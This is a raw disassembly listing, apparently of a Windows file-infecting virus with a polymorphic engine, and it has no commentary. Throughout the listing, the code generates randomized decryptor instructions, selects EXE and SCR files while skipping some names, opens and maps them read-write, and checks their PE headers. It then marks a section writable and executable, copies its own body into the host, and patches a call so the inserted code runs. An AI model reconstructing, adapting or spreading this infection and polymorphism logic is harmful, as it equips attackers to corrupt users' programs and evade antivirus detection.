loc_42F7DD: ; CODE XREF: sub_42F6C1+92�j
pop esi
loc_42F7DE: ; CODE XREF: sub_42F6C1+60�j
; sub_42F6C1+6C�j
add edx, 14h
jmp loc_42F6D5
; ---------------------------------------------------------------------------
locret_42F7E6: ; CODE XREF: sub_42F6C1+18�j
; sub_42F6C1+22�j
retn
sub_42F6C1 endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_42F7E8 proc near ; CODE XREF: .RLPack:0042F926�p
; .RLPack:0042F94C�p
push 4
pop eax
call sub_42EE05
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_42EE05
add edx, 8
xchg edx, ecx
loc_42F810: ; CODE XREF: sub_42F7E8:loc_42F84F�j
push 5
pop eax
call sub_42EE05
cmp dl, 3
jnb short loc_42F828
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_42F84F
; ---------------------------------------------------------------------------
loc_42F828: ; CODE XREF: sub_42F7E8+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_42F849
mov al, 11h
call sub_42EE05
mov eax, 1
loc_42F83D: ; CODE XREF: sub_42F7E8+5D�j
test dl, dl
jz short loc_42F84E
shl eax, 1
dec dl
jmp short loc_42F83D
; ---------------------------------------------------------------------------
jmp short loc_42F84E
; ---------------------------------------------------------------------------
loc_42F849: ; CODE XREF: sub_42F7E8+47�j
mov eax, 80000000h
loc_42F84E: ; CODE XREF: sub_42F7E8+57�j
; sub_42F7E8+5F�j
stosd
loc_42F84F: ; CODE XREF: sub_42F7E8+3E�j
loop loc_42F810
retn
sub_42F7E8 endp
; ---------------------------------------------------------------------------
loc_42F852: ; CODE XREF: sub_4302AC+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_42F867
mov al, 60h
stosb
loc_42F867: ; CODE XREF: .RLPack:0042F862�j
test dword ptr [ebp+403431h], 1000003h
jz loc_42F96D
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCCA42Bh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_42F8E5
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_42F8B0
mov eax, 2E8B6467h
loc_42F8B0: ; CODE XREF: .RLPack:0042F8A9�j
stosd
mov ax, 0
stosw
jz short loc_42F8BC
mov al, 5Dh
stosb
loc_42F8BC: ; CODE XREF: .RLPack:0042F8B7�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_42F8E3
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_42F8E3
mov eax, 0F8ED83h
loc_42F8E3: ; CODE XREF: .RLPack:0042F8CB�j
; .RLPack:0042F8DC�j
stosd
dec edi
loc_42F8E5: ; CODE XREF: .RLPack:0042F898�j
test dword ptr [ebp+403431h], 3
jz short loc_42F8F5
mov al, 0E9h
stosb
stosd
loc_42F8F5: ; CODE XREF: .RLPack:0042F8EF�j
mov eax, dword ptr ss:loc_403996[ebp]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_42F96D
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_42F7E8
mov al, 20h
call sub_42F601
jecxz short loc_42F96D
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_42F960
call sub_42F7E8
mov al, 1Fh
call sub_42F601
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_42F960: ; CODE XREF: .RLPack:0042F94A�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_42F96D: ; CODE XREF: .RLPack:0042F871�j
; .RLPack:0042F90C�j ...
test dword ptr [ebp+403431h], 4
jz short loc_42F98B
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_42F98B: ; CODE XREF: .RLPack:0042F977�j
test dword ptr [ebp+403431h], 8
jnz short loc_42F9E1
cmp byte ptr [ebp+40342Fh], 0
jz short loc_42F9E1
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_42F9DF
mov al, 49h
stosb
mov ax, 0FC75h
loc_42F9DF: ; CODE XREF: .RLPack:0042F9D6�j
stosw
loc_42F9E1: ; CODE XREF: .RLPack:0042F995�j
; .RLPack:0042F99E�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_42FA02
mov al, 58h
or al, [ebp+403429h]
stosb
loc_42FA02: ; CODE XREF: .RLPack:0042F9F7�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_42FA15
add ah, 28h
loc_42FA15: ; CODE XREF: .RLPack:0042FA10�j
or ah, [ebp+403429h]
stosw
mov dword ptr ss:loc_403986[ebp], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_42FA39
mov al, 50h
add al, [ebp+403429h]
stosb
loc_42FA39: ; CODE XREF: .RLPack:0042FA2E�j
test dword ptr [ebp+403431h], 80h
jnz short loc_42FA50
mov al, 0B8h
or al, byte ptr ss:loc_40342A[ebp]
stosb
jmp short loc_42FA8D
; ---------------------------------------------------------------------------
loc_42FA50: ; CODE XREF: .RLPack:0042FA43�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_42FA62
mov al, 29h
loc_42FA62: ; CODE XREF: .RLPack:0042FA5E�j
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_42FA85
mov ah, 0C8h
loc_42FA85: ; CODE XREF: .RLPack:0042FA81�j
or ah, byte ptr ss:loc_40342A[ebp]
stosw
loc_42FA8D: ; CODE XREF: .RLPack:0042FA4E�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_42FB11
test dword ptr [ebp+403431h], 400h
jnz short loc_42FABC
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_42FB09
; ---------------------------------------------------------------------------
loc_42FABC: ; CODE XREF: .RLPack:0042FAAF�j
test dword ptr [ebp+403431h], 800h
jnz short loc_42FAD9
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_42FAEE
; ---------------------------------------------------------------------------
loc_42FAD9: ; CODE XREF: .RLPack:0042FAC6�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_42FAEE: ; CODE XREF: .RLPack:0042FAD7�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_42FB01
add ah, 8
loc_42FB01: ; CODE XREF: .RLPack:0042FAFC�j
or ah, [ebp+40342Bh]
stosw
loc_42FB09: ; CODE XREF: .RLPack:0042FABA�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_42FB11: ; CODE XREF: .RLPack:0042FAA3�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_42FB26
mov al, 50h
add al, [ebp+403429h]
stosb
loc_42FB26: ; CODE XREF: .RLPack:0042FB1B�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_42FB36
add al, 4
loc_42FB36: ; CODE XREF: .RLPack:0042FB32�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov dword ptr ss:loc_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_42FB53
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_42FB53: ; CODE XREF: .RLPack:0042FB4A�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_42FB65
mov ah, 29h
loc_42FB65: ; CODE XREF: .RLPack:0042FB61�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_42FB83
mov al, 86h
loc_42FB83: ; CODE XREF: .RLPack:0042FB7F�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_42FB97
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_42FB97: ; CODE XREF: .RLPack:0042FB8E�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_42FBAE
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_42FBBD
; ---------------------------------------------------------------------------
loc_42FBAE: ; CODE XREF: .RLPack:0042FBA1�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_42FBBD: ; CODE XREF: .RLPack:0042FBAC�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_42FBF8
test dword ptr [ebp+403431h], 40000h
jnz short loc_42FBEF
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_42FBF7
; ---------------------------------------------------------------------------
loc_42FBEF: ; CODE XREF: .RLPack:0042FBD3�j
mov al, 40h
or al, [ebp+40342Bh]
loc_42FBF7: ; CODE XREF: .RLPack:0042FBED�j
stosb
loc_42FBF8: ; CODE XREF: .RLPack:0042FBC7�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_42FC14
mov ax, 0E883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov al, 1
jmp short loc_42FC1C
; ---------------------------------------------------------------------------
loc_42FC14: ; CODE XREF: .RLPack:0042FC02�j
mov al, 48h
or al, byte ptr ss:loc_40342A[ebp]
loc_42FC1C: ; CODE XREF: .RLPack:0042FC12�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_42FC50
mov ax, 0F883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
xor eax, eax
stosb
sub dword ptr ss:loc_40398A[ebp], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_42FC6B
mov cl, 77h
jmp short loc_42FC6B
; ---------------------------------------------------------------------------
loc_42FC50: ; CODE XREF: .RLPack:0042FC29�j
mov ax, 1809h
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
sub dword ptr ss:loc_40398A[ebp], edi
loc_42FC6B: ; CODE XREF: .RLPack:0042FC4A�j
; .RLPack:0042FC4E�j
mov al, cl
mov ah, byte ptr ss:loc_40398A[ebp]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_42FD15
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_42FCAC
mov eax, 2E876467h
loc_42FCAC: ; CODE XREF: .RLPack:0042FCA5�j
stosd
mov eax, 0
stosw
jnz short loc_42FCBC
mov ax, 0E58Bh
stosw
loc_42FCBC: ; CODE XREF: .RLPack:0042FCB4�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_42FD12
test dword ptr [ebp+403431h], 8000000h
jz short loc_42FD04
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_42FCFF
mov ax, 424h
stosw
jmp short loc_42FD12
; ---------------------------------------------------------------------------
loc_42FCFF: ; CODE XREF: .RLPack:0042FCF5�j
mov al, 8
stosb
jmp short loc_42FD12
; ---------------------------------------------------------------------------
loc_42FD04: ; CODE XREF: .RLPack:0042FCDC�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_42FD15
; ---------------------------------------------------------------------------
loc_42FD12: ; CODE XREF: .RLPack:0042FCD0�j
; .RLPack:0042FCFD�j ...
mov al, 0C9h
stosb
loc_42FD15: ; CODE XREF: .RLPack:0042FC88�j
; .RLPack:0042FD10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_42FD41
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_42FD41: ; CODE XREF: .RLPack:0042FD1F�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_42FDAC
test dword ptr [ebp+403431h], 20000000h
jz short loc_42FD72
loc_42FD65: ; CODE XREF: .RLPack:0042FD70�j
test edi, 3
jz short loc_42FD72
mov al, 90h
stosb
jmp short loc_42FD65
; ---------------------------------------------------------------------------
loc_42FD72: ; CODE XREF: .RLPack:0042FD63�j
; .RLPack:0042FD6B�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_42FDA0
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_42FDAA
; ---------------------------------------------------------------------------
loc_42FDA0: ; CODE XREF: .RLPack:0042FD92�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_42FDAA: ; CODE XREF: .RLPack:0042FD9E�j
stosw
loc_42FDAC: ; CODE XREF: .RLPack:0042FD57�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_42FE2B
test dword ptr [ebp+403431h], 20000000h
jz short loc_42FDD1
loc_42FDC4: ; CODE XREF: .RLPack:0042FDCF�j
test edi, 3
jz short loc_42FDD1
mov al, 90h
stosb
jmp short loc_42FDC4
; ---------------------------------------------------------------------------
loc_42FDD1: ; CODE XREF: .RLPack:0042FDC2�j
; .RLPack:0042FDCA�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_42FDFA
lea eax, [ebp+403429h]
loc_42FDF2: ; CODE XREF: .RLPack:0042FDF8�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_42FDF2
loc_42FDFA: ; CODE XREF: .RLPack:0042FDEA�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_42FE0F
mov ax, 0C031h
stosw
loc_42FE0F: ; CODE XREF: .RLPack:0042FE07�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_42FE28
mov ax, 0C031h
stosw
loc_42FE28: ; CODE XREF: .RLPack:0042FE20�j
mov al, 0C3h
stosb
loc_42FE2B: ; CODE XREF: .RLPack:0042FDB6�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_42FE43
push edi
sub edi, eax
pop eax
jmp short loc_42FE5C
; ---------------------------------------------------------------------------
loc_42FE43: ; CODE XREF: .RLPack:0042FE3B�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_42FE5C: ; CODE XREF: .RLPack:0042FE41�j
mov [ebp+40106Dh], edi
mov edi, dword ptr ss:loc_403986[ebp]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_42FE7C
neg eax
loc_42FE7C: ; CODE XREF: .RLPack:0042FE78�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_42FE80 proc near ; CODE XREF: sub_4302AC+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_430068
call near ptr loc_42FEA0+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_42FEA0: ; CODE XREF: sub_42FE80+F�p
add bh, bh
sub_42FE80 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_42F5BA
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_42F5BA
mov edi, [ebp+4039A6h]
push esi
call sub_42F5BA
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_430068
jz loc_430068
add esi, dword ptr ss:loc_4039AA[ebp]
add esi, dword ptr ss:loc_403972[ebp]
; START OF FUNCTION CHUNK FOR sub_430039
loc_42FF1A: ; CODE XREF: sub_430039+29�j
lodsb
cmp al, 0E8h
jnz loc_42FFC5
lea eax, [esi+4]
sub eax, dword ptr ss:loc_403972[ebp]
add eax, [esi]
push eax
call sub_42F5BA
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_42FF48
cmp eax, [edi+0Ch]
jnb loc_430061
jmp short loc_42FF54
; ---------------------------------------------------------------------------
loc_42FF48: ; CODE XREF: sub_430039-FE�j
cmp [ebp+4039A6h], edx
jnz loc_430061
loc_42FF54: ; CODE XREF: sub_430039-F3�j
add eax, dword ptr ss:loc_403972[ebp]
cmp word ptr [eax], 25FFh
jnz loc_430061
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_42F5BA
cmp [ebp+4039A6h], edi
jnz loc_430061
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, dword ptr ss:loc_403972[ebp]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_430061
cmp eax, [edi+8]
jnb loc_430061
loc_42FF9D: ; CODE XREF: sub_430039:loc_43005B�j
add eax, 2
add eax, [edi+14h]
add eax, dword ptr ss:loc_403972[ebp]
push edx
push eax
push dword ptr ss:loc_4039BE[ebp]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_430077
jmp loc_430061
; ---------------------------------------------------------------------------
loc_42FFC5: ; CODE XREF: sub_430039-11C�j
cmp al, 0FFh
jnz loc_430061
cmp byte ptr [esi], 15h
jnz loc_430061
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_42F5BA
cmp [ebp+4039A6h], edi
jnz short loc_430061
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, dword ptr ss:loc_403972[ebp]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_43000E
cmp eax, [ebp+4039C6h]
jb short loc_430077
loc_43000E: ; CODE XREF: sub_430039-35�j
cmp eax, 70000000h
jb short loc_43004C
call sub_430039
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_430038
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_430053
; ---------------------------------------------------------------------------
locret_430038: ; CODE XREF: sub_430039-F�j
retn
; END OF FUNCTION CHUNK FOR sub_430039
; =============== S U B R O U T I N E =======================================
sub_430039 proc near ; CODE XREF: sub_430039-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0042FF1A SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, dword ptr ss:loc_403972[ebp]
call sub_42F6C1
popa
loc_43004C: ; CODE XREF: sub_430039-26�j
test eax, 80000000h
jnz short loc_430061
loc_430053: ; CODE XREF: sub_430039-3�j
sub eax, [edi+0Ch]
jb short loc_430061
cmp eax, [edi+8]
loc_43005B: ; DATA XREF: .packed:0041A720�o
jb loc_42FF9D
loc_430061: ; CODE XREF: sub_430039-F9�j
; sub_430039-EB�j ...
dec ecx
jnz loc_42FF1A
loc_430068: ; CODE XREF: sub_42FE80+9�j
; .RLPack:0042FF02�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_4300B3
; ---------------------------------------------------------------------------
loc_430077: ; CODE XREF: sub_430039-7F�j
; sub_430039-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, dword ptr ss:loc_403972[ebp]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_4300B3: ; CODE XREF: sub_430039+3C�j
pop edi
pop esi
retn
sub_430039 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4300B6 proc near ; CODE XREF: .RLPack:00430284�p
; sub_4302AC+127�p
lea esi, loc_40384E[ebp]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_430187
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_430187
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_43063F
mov [ebp+403956h], eax
lea ecx, loc_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_430633
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_430633
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_430633
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr ss:loc_4035A0[ebp]
test eax, eax
jz loc_43060B
mov dword ptr ss:loc_403972[ebp], eax
locret_430187: ; CODE XREF: sub_4300B6+10�j
; sub_4300B6+27�j ...
retn
sub_4300B6 endp
; =============== S U B R O U T I N E =======================================
sub_430188 proc near ; CODE XREF: sub_4302AC+117�p
; sub_4302AC+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_4301A2
add eax, [ebp+40106Dh]
loc_4301A2: ; CODE XREF: sub_430188+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov dword ptr ss:loc_40397A[ebp], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_430188 endp
; =============== S U B R O U T I N E =======================================
sub_4301CD proc near ; CODE XREF: sub_4302AC:loc_4302FB�p
; sub_4302AC+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_4301D2: ; CODE XREF: sub_4301CD+23�j
jecxz short locret_430209
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_430209
cmp dword ptr [edx+0Ch], 1
jb short loc_4301D2
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_430209: ; CODE XREF: sub_4301CD:loc_4301D2�j
; sub_4301CD+1D�j ...
retn
sub_4301CD endp
; =============== S U B R O U T I N E =======================================
sub_43020A proc near ; CODE XREF: .RLPack:00430296�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_43020A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_430217: ; CODE XREF: .RLPack:00430238�j
mov ecx, edi
jmp short loc_430226
; ---------------------------------------------------------------------------
lea edi, loc_40384E[ebp]
cld
loc_430222: ; CODE XREF: .RLPack:00430234�j
mov ebx, edi
xor ecx, ecx
loc_430226: ; CODE XREF: .RLPack:00430219�j
; .RLPack:0043023C�j
lodsb
cmp al, 61h
jb short loc_430231
cmp al, 7Ah
ja short loc_430231
sub al, 20h
loc_430231: ; CODE XREF: .RLPack:00430229�j
; .RLPack:0043022D�j
stosb
cmp al, 5Ch
jz short loc_430222
cmp al, 2Eh
jz short loc_430217
cmp al, 0
jnz short loc_430226
jecxz short locret_430209
mov eax, [ecx]
cmp eax, 455845h
jz short loc_430254
cmp eax, 524353h
jnz locret_430187
loc_430254: ; CODE XREF: .RLPack:00430247�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_430187
cmp eax, 4E554357h
jz locret_430187
cmp eax, 32334357h
jz locret_430187
cmp eax, 4F545350h
jz locret_430187
xor ebx, ebx
call sub_4300B6
jz locret_430187
xor edx, edx
call sub_4302AC
call sub_43020A
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_4305E9
; =============== S U B R O U T I N E =======================================
sub_4302AC proc near ; CODE XREF: .RLPack:00430291�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, dword ptr ss:loc_403972[ebp]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_4305E9
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_4305E9
test dword ptr [ebx+16h], 2000h
jnz loc_4305E9
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_4305E9
jecxz short loc_4302FB
cmp ecx, 101h
jbe loc_4305E9
loc_4302FB: ; CODE XREF: sub_4302AC+41�j
call sub_4301CD
jb loc_4305E9
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_42EE05
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_430325: ; CODE XREF: sub_4302AC+92�j
push 20h
dec cl
pop eax
js short loc_430340
call sub_42EE05
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_430325
; ---------------------------------------------------------------------------
loc_430340: ; CODE XREF: sub_4302AC+7E�j
; sub_4302AC+CD�j ...
push 6
pop ecx
loc_430346: ; CODE XREF: sub_4302AC+B8�j
push 6
pop eax
call sub_42EE05
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_430346
test dword ptr [ebp+403431h], 8
jnz short loc_43037B
cmp byte ptr [ebp+40342Bh], 1
jz short loc_430340
loc_43037B: ; CODE XREF: sub_4302AC+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_4303A2
cmp byte ptr [ebp+403429h], 5
jz short loc_430340
cmp byte ptr ss:loc_40342A[ebp], 5
jz short loc_430340
cmp byte ptr [ebp+40342Bh], 5
jz short loc_430340
loc_4303A2: ; CODE XREF: sub_4302AC+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_4303B7
cmp byte ptr [ebp+403429h], 2
ja short loc_430340
loc_4303B7: ; CODE XREF: sub_4302AC+100�j
and dword ptr [ebp+4039AEh], 0
call loc_42F852
call sub_430188
call sub_4305F2
mov ebx, [ebp+403976h]
call sub_4300B6
jz loc_4305E9
mov esi, dword ptr ss:loc_403972[ebp]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_4301CD
jb loc_4305E9
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_43041F
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_43041F: ; CODE XREF: sub_4302AC+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_430433
rep movsb
loc_430433: ; CODE XREF: sub_4302AC+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_4304EB
push dword ptr [ebx+28h]
call sub_42F5BA
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_4304EB
mov esi, dword ptr ss:loc_403972[ebp]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_430470
xor ecx, ecx
loc_430470: ; CODE XREF: sub_4302AC+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_4304D7
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, dword ptr ss:loc_403986[ebp]
test dword ptr [ebp+403431h], 40h
jz short loc_4304B0
neg dword ptr [eax]
loc_4304B0: ; CODE XREF: sub_4302AC+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_4304CE
neg dword ptr [eax]
loc_4304CE: ; CODE XREF: sub_4302AC+21E�j
push ecx
call sub_430188
pop ecx
jmp short loc_4304E3
; ---------------------------------------------------------------------------
loc_4304D7: ; CODE XREF: sub_4302AC+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_4304E3: ; CODE XREF: sub_4302AC+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_4304EB: ; CODE XREF: sub_4302AC+191�j
